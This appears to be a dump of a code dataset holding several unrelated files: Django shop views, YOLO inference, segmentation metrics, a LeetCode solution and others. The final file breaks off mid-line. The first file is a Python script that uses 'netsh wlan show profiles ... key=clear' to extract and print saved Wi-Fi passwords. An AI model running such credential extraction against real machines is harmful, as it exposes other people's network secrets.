text
string
size
int64
token_count
int64
#@ayuboid --- salahuddin[@]protonmail.ch/com import subprocess class t: def user(self): x_1=subprocess.Popen("netsh wlan show profiles",stdout=subprocess.PIPE) #run IDE as admin stdout=x_1.communicate()[0] return stdout def password_1(self,name): for pswd in name: #remove spaces from both sides [pswd[1].strip()] x_1=subprocess.Popen(r'netsh wlan show profiles name="%s" key=clear' %pswd[1].strip(),stdout=subprocess.PIPE) #run IDE as admin #-----> Important NOTe:if there are spaces between the values then send raw strings FORMAT[r'"<type>"' %<variable>] #----->Make sure remove unwanted space in names #communicate() method is used to get the output from pipe stdout=x_1.communicate()[0] stdout=stdout.decode().splitlines() for line in stdout: if "Key Content" in line: print("Username : %s\nPassword : %s " % (pswd[1],line.split(":")[1])) class t1(t): def username(self): x_1=self.user() name_list=[] #Decode (binary to utf8) and then split it by lines x_1=x_1.decode().splitlines() #Extract the string from list for l in x_1: #Check For the string in given line if "All User Profile" in l: #Split the current line from : e-g test : OK -----> ['test','OK'] and append to list name_list.append(l.split(":")) return name_list def password(self): name_list=self.username() name=self.password_1(name_list) b=t1() b.password() #print(b.username()) GET USERNAMES #You can also use os.system
1,709
528
class Solution(object): def XXX(self, nums): """ :type nums: List[int] :rtype: int """ def maxSub(arr,lo,hi): if lo == hi:return arr[lo] mid = (lo+hi) // 2 # 左最大 left = maxSub(arr,lo,mid) # 右最大 right = maxSub(arr,mid+1,hi) # 中间最大 leftMid,rightMid = float("-inf"),float("-inf") tempL,tempR = 0,0 for i in range(mid,lo-1,-1): tempL += arr[i] leftMid = max(leftMid,tempL) for i in range(mid+1,hi+1): tempR += arr[i] rightMid = max(rightMid,tempR) return max(left,right,leftMid+rightMid) return maxSub(nums,0,len(nums)-1)
760
277
import os.path as osp import pickle import shutil import tempfile import os import mmcv import numpy as np import torch import torch.distributed as dist from mmcv.image import tensor2imgs from mmcv.runner import get_dist_info import pandas as pd import json import cv2 from PIL import Image from sklearn.metrics.cluster import adjusted_rand_score import shutil from sklearn.metrics.cluster import adjusted_rand_score, adjusted_mutual_info_score, fowlkes_mallows_score, rand_score, \ silhouette_score, calinski_harabasz_score, davies_bouldin_score import math from mmseg.apis.inference import inference_segmentor from mmseg.apis.inference import init_segmentor def testing_metric(img_path, output_folder, model, show_dir, k): MI_list = [] name_list = [] k_list = [] if k==-1: for name in os.listdir(img_path): MI_max = 0 img_name = img_path+name result = inference_segmentor(model, img_name, k) out_file=show_dir+name image_test = cv2.imread(img_name) MI = cluster_heterogeneity(image_test, result[0], 0) if MI_max < MI: MI_max = MI optimal_name = name for tmp_k in range(4, 10): MI_max = 0 img_name = img_path+optimal_name result = inference_segmentor(model, img_name, tmp_k) out_file=show_dir+name model.show_result( img_name, result, palette=None, show=False, out_file=out_file) image_test = cv2.imread(img_name) if not os.path.exists(output_folder+'result_temp/'): os.makedirs(output_folder+'result_temp/') np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',') MI = cluster_heterogeneity(image_test, result[0], 0) if MI_max < MI: MI_max = MI optimal_k = tmp_k result = inference_segmentor(model, img_name, optimal_k) model.show_result( img_name, result, palette=None, show=False, out_file=out_file) k_list.append(optimal_k) name_list.append(optimal_name) MI_list.append(MI_max) MI_result = { 'name': name_list, 'k':k_list, 'MI': MI_list, } MI_result = pd.DataFrame(MI_result) MI_result = MI_result.sort_values(by=['MI'], ascending=False) if len(name_list) > 5: MI_result_top5 = MI_result[0:5] name = MI_result_top5.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder+'result/'): os.makedirs(output_folder+'result/') shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv') # shutil.rmtree(show_dir) # shutil.rmtree(output_folder+'result_temp/') MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) else: name = MI_result.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder + 'result/'): os.makedirs(output_folder + 'result/') shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder + 'result_temp/') MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) top1_name = MI_result.iloc[:, 0].values[0] top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv' top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",") else: for name in os.listdir(img_path): img_name = img_path+name name_list.append(name) result = inference_segmentor(model, img_name, k) out_file=show_dir+name print(out_file) model.show_result( img_name, result, palette=None, show=False, out_file=out_file) image_test = cv2.imread(img_name) if not os.path.exists(output_folder+'result_temp/'): os.makedirs(output_folder+'result_temp/') np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',') MI = cluster_heterogeneity(image_test, result[0], 0) MI_list.append(MI) MI_result = { 'name': name_list, 'MI': MI_list, } MI_result = pd.DataFrame(MI_result) MI_result = MI_result.sort_values(by=['MI'], ascending=False) if len(name_list) > 5: MI_result_top5 = MI_result[0:5] # print(MI_result_top5) name = MI_result_top5.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder+'result/'): os.makedirs(output_folder+'result/') shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv') # shutil.rmtree(show_dir) # shutil.rmtree(output_folder+'result_temp/') MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) else: name = MI_result.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder + 'result/'): os.makedirs(output_folder + 'result/') shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder + 'result_temp/') MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) top1_name = MI_result.iloc[:, 0].values[0] top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv' top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",") # shutil.rmtree(output_folder + 'result/') return top1_category_map def evaluation_metric(adata, img_path, output_folder, model, show_dir, label_path, k): MI_list = [] name_list = [] ARI_list = [] AMI_list = [] FMI_list = [] RI_list = [] k_list = [] if k == -1: for name in os.listdir(img_path): MI_max = 0 img_name = img_path+name result = inference_segmentor(model, img_name, k) out_file=show_dir+name image_test = cv2.imread(img_name) MI = cluster_heterogeneity(image_test, result[0], 0) if MI_max < MI: MI_max = MI optimal_name = name for tmp_k in range(4, 10): MI_max = 0 img_name = img_path+optimal_name result = inference_segmentor(model, img_name, tmp_k) out_file=show_dir+name model.show_result( img_name, result, palette=None, show=False, out_file=out_file) image_test = cv2.imread(img_name) if not os.path.exists(output_folder+'result_temp/'): os.makedirs(output_folder+'result_temp/') np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',') MI = cluster_heterogeneity(image_test, result[0], 0) name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path) if MI_max < MI: MI_max = MI optimal_k = tmp_k optimal_ARI = ARI optimal_MI = MI optimal_AMI = AMI optimal_FMI = FMI optimal_RI = RI result = inference_segmentor(model, img_name, optimal_k) model.show_result( img_name, result, palette=None, show=False, out_file=out_file) k_list.append(optimal_k) name_list.append(optimal_name) MI_list.append(optimal_MI) ARI_list.append(optimal_ARI) AMI_list.append(optimal_AMI) FMI_list.append(optimal_FMI) RI_list.append(optimal_RI) MI_result = { 'name': name_list, 'k':k_list, "ARI": ARI_list, "AMI": AMI_list, "FMI": FMI_list, "RI": RI_list, 'MI': MI_list, } MI_result = pd.DataFrame(MI_result) MI_result = MI_result.sort_values(by=['MI'], ascending=False) if len(name_list) > 5: MI_result_top5 = MI_result[0:5] # print(MI_result_top5) name = MI_result_top5.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder+'result/'): os.makedirs(output_folder+'result/') shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder+'result_temp/') MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) else: name = MI_result.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder + 'result/'): os.makedirs(output_folder + 'result/') shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder + 'result_temp/') MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) top1_name = MI_result.iloc[:, 0].values[0] top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv' top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",") shutil.rmtree(output_folder + 'result/') else: for name in os.listdir(img_path): img_name = img_path+name name_list.append(name) result = inference_segmentor(model, img_name, k) name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path) ARI_list.append(ARI) AMI_list.append(AMI) FMI_list.append(FMI) RI_list.append(RI) # print(result[0]) print(img_name) out_file=show_dir+name # print(out_file) model.show_result( img_name, result, palette=None, show=False, out_file=out_file) image_test = cv2.imread(img_name) if not os.path.exists(output_folder+'result_temp/'): os.makedirs(output_folder+'result_temp/') np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',') MI = cluster_heterogeneity(image_test, result[0], 0) MI_list.append(MI) MI_result = { 'name': name_list, "ARI": ARI_list, "AMI": AMI_list, "FMI": FMI_list, "RI": RI_list, 'MI': MI_list, } MI_result = pd.DataFrame(MI_result) MI_result = MI_result.sort_values(by=['MI'], ascending=False) if len(name_list) > 5: MI_result_top5 = MI_result[0:5] # print(MI_result_top5) name = MI_result_top5.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder+'result/'): os.makedirs(output_folder+'result/') shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder+'result_temp/') MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) else: name = MI_result.iloc[:, 0].values for n in name: prefix = n.split('.png')[0] show = cv2.imread(show_dir + n) if not os.path.exists(output_folder + 'segmentation_map/'): os.makedirs(output_folder + 'segmentation_map/') cv2.imwrite(output_folder + 'segmentation_map/' + n, show) if not os.path.exists(output_folder + 'result/'): os.makedirs(output_folder + 'result/') shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv') shutil.rmtree(show_dir) shutil.rmtree(output_folder + 'result_temp/') MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True) top1_name = MI_result.iloc[:, 0].values[0] top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv' top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",") shutil.rmtree(output_folder + 'result/') return top1_category_map def cluster_heterogeneity(image_test, category_map, background_category): if len(category_map.shape) > 2: category_map = cv2.cvtColor(category_map, cv2.COLOR_BGR2GRAY) category_list = np.unique(category_map) W = np.zeros((len(category_list), len(category_list))) for i in range(category_map.shape[0]): flag1 = category_map[i][0] flag2 = category_map[0][i] for j in range(category_map.shape[0]): if category_map[i][j] != flag1: # for row index1 = np.where(category_list == flag1)[0][0] index2 = np.where(category_list == category_map[i][j])[0][0] W[index1][index2] = 1 W[index2][index1] = 1 flag1 = category_map[i][j] if category_map[j][i] != flag2: # for column index1 = np.where(category_list == flag2)[0][0] index2 = np.where(category_list == category_map[j][i])[0][0] W[index1][index2] = 1 W[index2][index1] = 1 flag2 = category_map[j][i] W = W[1:, 1:] # # print(W) category_num = W.shape[0] # print(R.shape) MI_list = [] image_test_ori = image_test # Calculate the average color value of each channel in each cluster for channel in range(3): image_test = image_test_ori[:, :, channel] # print(image_test) num = 0 gray_list = [] gray_mean = 0 for category in category_list: pixel_x, pixel_y = np.where(category_map == category) if category == background_category: num = len(pixel_x) continue gray = [] for i in range(len(pixel_x)): gray.append(image_test[pixel_x[i], pixel_y[i]]) gray_value = np.mean(gray) gray_list.append(gray_value) gray_mean += gray_value * len(pixel_x) gray_mean = gray_mean / (image_test.shape[0] ** 2 - num) n = W.shape[0] a = 0 b = 0 for p in range(n): index, = np.where(W[p] == 1) for q in range(len(index)): a += abs((gray_list[p] - gray_mean) * (gray_list[index[q]] - gray_mean)) b += (gray_list[p] - gray_mean) ** 2 MI = n * a / (b * np.sum(W)) MI_list.append(MI) # print(MI_list) MI = math.sqrt((MI_list[0] ** 2 + MI_list[1] ** 2 + MI_list[2] ** 2) / 3) # print(MI) return MI def calculate(adata, output, img_path, label_path): img_name = img_path.split('/')[-1] # eg:151507_50_32_....png samples_num = img_name.split('_')[0] # eg:151507 labels = save_spot_RGB_to_image(label_path, adata) # label label = labels.flatten().tolist() output = np.array(output).flatten().tolist() # print('len(output)',len(output)) label_final = [] output_final = [] shape = adata.uns["img_shape"] for i in range(shape ** 2): if label[i] != 0: label_final.append(label[i]) output_final.append(output[i]) ARI = adjusted_rand_score(label_final, output_final) AMI = adjusted_mutual_info_score(label_final, output_final) FMI = fowlkes_mallows_score(label_final, output_final) RI = rand_score(label_final, output_final) print('name', img_name) print('ARI:', ARI) return img_name, ARI, AMI, FMI, RI def save_spot_RGB_to_image(label_path, adata): # data_file = os.path.join(data_folder, expression_file) X = pd.read_csv(label_path) X = X.sort_values(by=['barcode']) # print(X) # print(adata.obs) assert all(adata.obs.index == X.iloc[:, 0].values) layers = X.iloc[:, 1].values # print(layers) spot_row = adata.obs["pxl_col_in_fullres"] spot_col = adata.obs["pxl_row_in_fullres"] radius = int(0.5 * adata.uns['fiducial_diameter_fullres'] + 1) # radius = int(scaler['spot_diameter_fullres'] + 1) max_row = max_col = int((2000 / adata.uns['tissue_hires_scalef']) + 1) # radius = round(radius * (600 / 2000)) # max_row = np.max(spot_row) # max_col = np.max(spot_col) img = np.zeros(shape=(max_row + 1, max_col + 1), dtype=np.int) img = img.astype(np.uint8) for index in range(len(layers)): if layers[index] == 'Layer1': # print('layer1') # img[spot_row[index], spot_col[index]] = [0,0,255] img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 1 # print(img[spot_row[index],spot_col[index]]) # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,255),thickness=-1) elif layers[index] == 'Layer2': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 2 # img[spot_row[index], spot_col[index]] = [0,255,0] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,0),thickness=-1) # print(img[spot_row[index],spot_col[index]]) elif layers[index] == 'Layer3': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 3 # img[spot_row[index], spot_col[index]] = [255,0,0] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,0),thickness=-1) elif layers[index] == 'Layer4': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 4 # img[spot_row[index], spot_col[index]] = [255,0,255] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,255),thickness=-1) elif layers[index] == 'Layer5': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 5 # img[spot_row[index], spot_col[index]] = [0,255,255] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,255),thickness=-1) elif layers[index] == 'Layer6': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 6 # img[spot_row[index], spot_col[index]] = [255,255,0] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,255,0),thickness=-1) elif layers[index] == 'WM': img[(spot_row[index] - radius):(spot_row[index] + radius), (spot_col[index] - radius):(spot_col[index] + radius)] = 7 # img[spot_row[index], spot_col[index]] = [0,0,0] # cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,0),thickness=-1) shape = adata.uns["img_shape"] label_img = cv2.resize(img, dsize=(shape, shape), interpolation=cv2.INTER_NEAREST) return label_img
23,831
8,047
import logging import asab from .service import ProactorService # L = logging.getLogger(__name__) # asab.Config.add_defaults( { 'asab:proactor': { 'max_workers': '0', 'default_executor': True, } } ) class Module(asab.Module): ''' Proactor pattern based on loop.run_in_executor() https://en.wikipedia.org/wiki/Proactor_pattern ''' def __init__(self, app): super().__init__(app) self.service = ProactorService(app, "asab.ProactorService")
467
187
""" Conversion Tunnel ------ checkout > shipment > payment > success Payment process ------- 1. On submitting the form, an AJAX request is done using Stripe in order to get the token 2. An intermediate view is used afterwards to process the payment ofn the backend side 3. If the payment was successful, a redirect is done to the SuccessView """ import json import random from cart import models as cart_models from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin from django.core import cache, paginator from django.db import transaction from django.db.models.aggregates import Avg from django.http.response import Http404, HttpResponseForbidden, JsonResponse from django.shortcuts import get_object_or_404, redirect, render, reverse from django.utils.decorators import method_decorator from django.utils.translation import gettext from django.utils.translation import gettext_lazy as _ from django.views.decorators.cache import cache_page, never_cache from django.views.decorators.csrf import csrf_exempt from django.views.decorators.http import require_POST from django.views.generic import DetailView, ListView, TemplateView, View from shop import models, serializers, sizes, tasks, utilities def create_vue_products(queryset): items = [] for product in queryset: images = product.images variant = product.variant base = { 'id': product.id, 'reference': product.reference, 'url': product.get_absolute_url(), 'collection': { 'name': product.collection.name }, 'name': product.name, 'price': str(product.get_price()), 'main_image': product.get_main_image_url, 'images': list(images.values('id', 'name', 'url', 'web_url', 'variant', 'main_image')), 'variant': list(variant.values('id', 'name', 'verbose_name', 'in_stock', 'active')), 'in_stock': product.in_stock, 'our_favorite': product.our_favorite, 'is_discounted': product.is_discounted, 'price_pre_tax': str(product.price_pre_tax), 'discounted_price': str(product.discounted_price), 'slug': product.slug } items.append(base) return items @method_decorator(cache_page(60 * 30), name='dispatch') class IndexView(View): """Base view for the website's shop""" def get(self, request, *args, **kwargs): return render(request, 'pages/shop.html') @method_decorator(cache_page(60 * 15), name='dispatch') class ShopGenderView(View): """Base view for discovering the website's shop by category e.g. gender """ def get(self, request, *args, **kwargs): context = {} gender = kwargs.get('gender') collections = models.Collection.objects.filter( gender=gender.title() ) if collections.exists(): context = {'collections': collections[:3]} return render(request, 'pages/shop_gender.html', context) class ProductsView(ListView): """Main product's page""" model = models.Collection template_name = 'pages/collections.html' context_object_name = 'products' paginate_by = 12 ordering = '-created_on' def get_queryset(self, **kwargs): view_name = self.kwargs.get('collection') try: collection = self.model.objects.get( view_name__exact=view_name ) except: raise Http404("La collection n'existe pas") else: queryset = collection.product_set.filter( active=True, private=False ) category = self.request.GET.get('category', None) if category is None: return queryset authorized_categories = ['all', 'promos', 'favorites'] if category in authorized_categories: if category == 'all': return queryset elif category == 'promos': return queryset.filter(discounted=True) elif category == 'favorites': return queryset.filter(our_favorite=True) else: return queryset def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) products = self.get_queryset(**kwargs) # Set a specific pagination number to # active depending on which page we are context['current_active_page'] = self.request.GET.get('page', 1) klass = super().get_paginator(products, self.paginate_by) # serialized_products = serializers.ProductSerializer( # instance=klass.object_list, # many=True # ) # context['vue_products'] = serialized_products.data # When passing to another category, the previous # products are still in the cache which creates # an issue category = self.request.GET.get('category') # if category is not None: # cache.cache.delete('vue_products') # Specific technique in order to include the # product url, main_image url and images # vue_products = cache.cache.get('vue_products', None) vue_products = create_vue_products(klass.object_list) # if vue_products is None: # cache.cache.set('vue_products', vue_products, timeout=1200) context['vue_products'] = json.dumps(vue_products) collection = self.model.objects.get( view_name__exact=self.kwargs.get('collection'), gender=self.kwargs.get('gender').title() ) context['collection'] = collection return context @method_decorator(cache_page(60 * 15), name='dispatch') class ProductView(DetailView): """View the details of a given product""" model = models.Product template_name = 'pages/product.html' context_object_name = 'product' def post(self, request, **kwargs): data = {'state': False} product = super().get_object() # TODO: Add a method function that prevent # triggering the rest of the method with # any kinds of post requests cart = cart_models.Cart.cart_manager.add_to_cart(request, product) if cart: data.update({'state': True}) else: messages.error( request, "Une erreur s'est produite - ADD-CA", extra_tags='alert-danger' ) return JsonResponse(data=data) def get_queryset(self, **kwargs): queryset = self.model.objects.all() return queryset def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data suggested_products = self.model.objects\ .prefetch_related('images') \ .filter(active=True).exclude(id=product.id)[:3] context['more'] = suggested_products context['has_liked'] = False if self.request.user.is_authenticated: likes = models.Like.objects.filter( product=product, user=self.request.user ) if likes.exists(): context.update({'has_liked': True}) reviews = product.review_set.all() context['reviews'] = reviews context['reviews_avg'] = reviews.aggregate(Avg('rating')) return context @method_decorator(never_cache, name='dispatch') class PreviewProductView(LoginRequiredMixin, DetailView): """ This is a custom view for previewing a product in the semi-original context of the main product page """ model = models.Product queryset = models.Product.objects.all() template_name = 'pages/preview.html' context_object_name = 'product' http_method_names = ['get'] def get(self, request, *args, **kwargs): content = super().get(request, *args, **kwargs) if not request.user.is_admin: return HttpResponseForbidden('You are not authorized on this page') return content def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data return context @method_decorator(cache_page(60 * 30), name='dispatch') @method_decorator(csrf_exempt, name='dispatch') class PrivateProductView(DetailView): """ This is a special custom viewing a product in a non classified manner and one that does not appear in the urls of the main site --; this can be perfect for testing a product from a marketing perspective """ model = models.Product queryset = models.Product.product_manager.private_products() template_name = 'pages/product.html' context_object_name = 'product' def post(self, request, **kwargs): product = super().get_object() # TODO: Add a method function that prevent # triggering the rest of the method with # any kinds of post requests cart = cart_models.Cart.cart_manager.add_to_cart(request, product) if cart: return JsonResponse(data={'success': 'success'}) else: return JsonResponse(data={'failed': 'missing parameters'}, status=400) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data return context class SearchView(ListView): """Main page for displaying product searches""" model = models.Product template_name = 'pages/search.html' context_object_name = 'products' paginate_by = 10 def get_queryset(self, **kwargs): searched_item = self.request.GET.get('q') if searched_item is None: return [] return self.model.product_manager.search_product(searched_item) def get_context_data(self, **kwargs): products = self.get_queryset(**kwargs) context = super().get_context_data(**kwargs) klass = super().get_paginator(self.get_queryset(**kwargs), self.paginate_by) serialized_products = serializers.ProductSerializer(instance=klass.object_list, many=True) context['vue_products'] = serialized_products.data # TODO collections = ['tops', 'pantalons'] random_collection = random.choice(collections) collection = models.Collection.objects.get(view_name=random_collection) proposed_products = collection.product_set.all()[:4] context['proposed_products'] = proposed_products return context @method_decorator(cache_page(60 * 60), name='dispatch') class SizeGuideView(TemplateView): """View for providing the customer with information on sizes etc.""" template_name = 'pages/size_guide.html' @require_POST @transaction.atomic def add_like(request, **kwargs): data = {'state': False} product = get_object_or_404(models.Product, id=kwargs['pk']) if request.user.is_authenticated: likes = product.like_set.filter(user=request.user) if likes.exists(): return JsonResponse(data=data) product.like_set.create(user=request.user) else: redirect_url = f"{reverse('accounts:login')}?next={product.get_absolute_url()}" data.update({'redirect_url': redirect_url}) return JsonResponse(data=data) @require_POST def size_calculator(request, **kwargs): """Calcultes from customer's measurements the correct size for him/her""" # data = json.loads(request.body) # bust = data['bust'] # chest = data['chest'] bust = request.POST.get('bust') chest = request.POST.get('chest') if bust is None and chest is None: return JsonResponse(data={'state': False}) bust = int(bust) chest = int(chest) calculator = sizes.BraCalculator(bust, chest) data = { 'state': True, 'result': calculator.get_full_bra_size, 'size': calculator.size, 'cup': calculator.cup } return JsonResponse(data=data) @require_POST @transaction.atomic def add_review(request, **kwargs): data = { 'state': False, 'message': "L'avis n'a pas pu être créé" } score = request.POST.get('score') text = request.POST.get('text') if request.user.is_authenticated: product = get_object_or_404(models.Product, id=kwargs.get('pk')) review = product.review_set.create( user=request.user, text=text, rating=score ) data.update({ 'state': True, 'message': "Votre avis a été créé" }) return JsonResponse(data=data)
13,266
3,736
"""Application entry point.""" from webapp import init_app app = init_app() # Using a development configuration app.config.from_object('config.DevConfig') # print(app.config) if __name__ == "__main__": app.run(host="0.0.0.0", debug=False)
245
84
import numpy as np import cv2 as cv import time import os import sys import multiprocessing def init(labelfile, config, weights): # Get the labels labels = open(labelfile).read().strip().split('\n') # Initializing colors to represent each label uniquely colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8') # Load the weights and configuration to form the pretrained YOLOv3 model net = cv.dnn.readNetFromDarknet(config, weights) # Get the output layer names of the model layer_names = net.getLayerNames() layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()] return labels, colors, net, layer_names def parse_input_path(input_path): data = [] # Get everything from input path for path in os.listdir(input_path): if ('.png' in path) or ('.jpg' in path) or ('jpeg' in path) or ('.mp4' in path) or ('.avi' in path): data.append(path) return data def start_yolo_process(args): fileslist = parse_input_path(args.input_path) processes = [] tag = [] # Parse through Input Data Folder for idx, file in enumerate(fileslist): pid = 0 while ((pid < multiprocessing.cpu_count()) and (idx < len(fileslist))): if ((idx + pid) < len(fileslist)): # Create Processes try: tFile = fileslist[idx+pid] in_path = str(args.input_path + tFile) processed_path = str(args.processed_folder + tFile) arguments = (tFile, in_path, processed_path, tFile[:tFile.find('.')], args.labels, args.config, args.weights, args.output_path, args.delay_time, args.save_video, args.option, args.video_output_path, args.confidence, args.threshold, pid, False, None) process = multiprocessing.Process(target=yolo_process, args=arguments) if in_path not in tag: processes.append(process) tag.append(in_path) except Exception as err: print("[ERROR] {e}".format(e=err)) pid += 1 # Execute Processes for process in processes: try: process.start() except Exception as err: print("[ERROR] {e}".format(e=err)) for process in processes: try: process.join() except Exception as err: print("[ERROR] {e}".format(e=err)) processes.clear() def yolo_process(file, file_path, done_path, output_name, labels, config, weights, save_path, delay_time, save_video, option, video_output_path, confidence, threshold, process_id, gui, gui_obj): image_path = None video_path = None if ('.png' in file_path) or ('.jpg' in file_path) or ('.jpeg' in file_path): image_path = file_path if ('.mp4' in file_path) or ('.avi' in file_path): video_path = file_path # Initialize labels, colors, and pretrain model try: labels, colors, net, layer_names = init(labels, config, weights) except Exception as err: print("[ERROR] {e}".format(e=err)) # If both image and video files are given then raise error if image_path is None and video_path is None: print('[WARNING] Neither path to an image or path to video provided. Starting Inference on Webcam...') # Do inference with given image if image_path: print('[INFO] Starting image processing of {ip}...'.format(ip=str(image_path))) if not os.path.exists(image_path): print("[ERROR] Image path does not exist. Exiting...") sys.exit() # Read the image try: img = cv.imread(image_path) height, width = img.shape[:2] except: raise Exception('[ERROR] Image cannot be loaded!\n' 'Please check the path provided!') finally: img, _, _, _, _, _, _, _, _ = infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold) save_image(img, output_name, save_path) os.rename(file_path, done_path) elif video_path: print('[INFO] Starting video processing of {vp}...'.format(vp=str(video_path))) if output_name is None: print("[ERROR] No output name specified. Exiting...") sys.exit() if not os.path.exists(video_path): print("[ERROR] Video path does not exist. Exiting...") sys.exit() # Read the video try: vid = cv.VideoCapture(video_path) boxHeight, boxWidth = 0, 0 height, width = None, None writer = None except: raise Exception('[ERROR] Video cannot be loaded!\n' 'Please check the path provided!') finally: timings = np.array([]) # Will attempt to count the number of frames in the video, # This is dependent on the OpenCV version try: total = int(vid.get(cv.CAP_PROP_FRAME_COUNT)) except: try: total = int(vid.get(cv.CV_CAP_PROP_FRAME_COUNT)) except: print("[WARNING] Have to count frames manually. This might take a while...") total = count_frames_manual(vid) print("[SUCCESS] Count complete...") delay = delay_time num_images = 0 # Scan each frame in video while True: grabbed, raw_frame = vid.read() try: labeled_frame = raw_frame.copy() except: labeled_frame = None # Checking if the complete video is read if not grabbed: break if width is None or height is None: height, width = labeled_frame.shape[:2] if writer is None and save_video is True: # Initialize the video writer fourcc = cv.VideoWriter_fourcc(*"MJPG") writer = cv.VideoWriter(video_output_path, fourcc, 30, (labeled_frame.shape[1], labeled_frame.shape[0]), True) # Time frame inference and show progress start = time.time() if delay <= 0 and labeled_frame is not None: labeled_frame, _, _, classids, _, xPos, yPos, boxWidth, boxHeight = infer_image(net, layer_names, height, width, 